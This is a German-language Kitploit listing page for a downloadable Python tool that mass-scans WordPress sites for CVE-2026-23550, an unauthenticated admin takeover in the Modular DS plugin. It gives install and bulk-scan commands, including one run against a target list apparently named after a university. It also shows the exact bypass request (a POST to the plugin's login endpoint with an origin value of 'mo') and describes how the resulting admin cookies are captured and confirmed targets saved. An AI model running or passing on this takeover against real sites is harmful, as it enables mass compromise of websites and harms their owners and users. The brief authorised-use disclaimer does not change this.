Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Mass-CVE-2026-23550-Exploit — Mehrthreadiger Python-Scanner für CVE-2026-23550, der eine nicht authentifizierte Admin-Übernahme im WordPress-Modular-DS-Plugin mit vollständiger wp-admin-Verifizierung erkennt. | Kitploit
Tools/GitHubGitHub/dzmind2312/mass-cve-2026-23550-exploit
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubdzmind2312/mass-cve-2026-23550-exploit

Mass-CVE-2026-23550-Exploit

Mehrthreadiger Python-Scanner für CVE-2026-23550, der eine nicht authentifizierte Admin-Übernahme im WordPress-Modular-DS-Plugin mit vollständiger wp-admin-Verifizierung erkennt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 6 MonatenNoch nicht geprüft

🔥 CVE-2026-23550 Modular DS Scanner

Mehrthread-fähiger Python-Scanner für die CVE-2026-23550 (CVSS 10.0) WordPress Modular DS Plugin ≤2.5.1 Schwachstelle, die über 40.000 Websites betrifft. Erkennt die nicht authentifizierte Admin-Übernahme über den getLogin()-Bypass mit vollständiger wp-admin-Zugriffsverifizierung. Funktionen ✨

root@kitploit:~
🔥 Vollständige Admin-Zugriffserkennung (Cookies + wp-admin-Verifizierung)

⚡ Mehrthread-Verarbeitung (bis zu 50+ gleichzeitige Ziele)

📊 Animierte Fortschrittsanzeige mit rich

🎨 Farbcodierte Übersichtstabelle

💾 Automatisches Speichern verwundbarer Ziele in eine Datei

🚀 Produktionsreife Timeouts und Fehlerbehandlung

Installation 🚀

bash pip3 install requests rich chmod +x modular_ds.py

Verwendung 📋

bash

Massen-Scan (50 Threads)

python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt

Bug-Bounty-Recon

python3 modular_ds.py -l univ-oran1.txt -t 20

Standard (20 Threads, vulns.txt-Ausgabe)

python3 modular_ds.py -l targets.txt

Format von targets.txt:

text https://target1.com http://site2.com

Kommentare überspringen

https://sub.domain.tld

Argumente Flag Beschreibung Standard -l, --list Erforderlich Zieldatei (1 URL/Zeile) - -t, --threads Maximale gleichzeitige Threads 20 -o, --output Ausgabedatei für verwundbare Ziele vulns.txt Beispielausgabe 🖥️

text 🔥 CVE-2026-23550 Modular DS Scanner 🔥 Ziele: 247 | Threads: 50 | Ausgabe: bounty_vulns.txt

⠋ Scanne Modular DS... 127/247 (51%) ✅ VERWUNDBAR: https://target.com 🔥 VOLLER ADMIN-ZUGRIFF: target.com

┌─────────────┬─────────────────────────────────────┬────────────┐ │ Status │ Ziel │ Details │ ├─────────────┼─────────────────────────────────────┼────────────┤ │ 🔥 VOLL │ https://target.com │ 3 Cookies │ └─────────────┴─────────────────────────────────────┴────────────┘

💾 4 verwundbare Ziele → bounty_vulns.txt

Erkennungslogik 🔍

text

  1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
  2. ✅ Prüfe wordpress_logged_in_* Admin-Cookie
  3. ✅ Verifiziere /wp-admin/ Dashboard-Zugriff
  4. 💾 Speichere bestätigte VOLLER ADMIN-ZUGRIFF Ziele

Rechtliche und ethische Nutzung ⚖️

text ⚠️ AUSSCHLIESSLICH FÜR: ✅ Autorisierte Penetrationstests ✅ Bug-Bounty-Programme
✅ Sicherheitsforschungslabore ✅ Eigene Infrastruktur

❌ NIE auf nicht autorisierten Zielen verwenden

Anforderungen 📦

text requests>=2.31.0 rich>=13.0.0

Tool herunterladen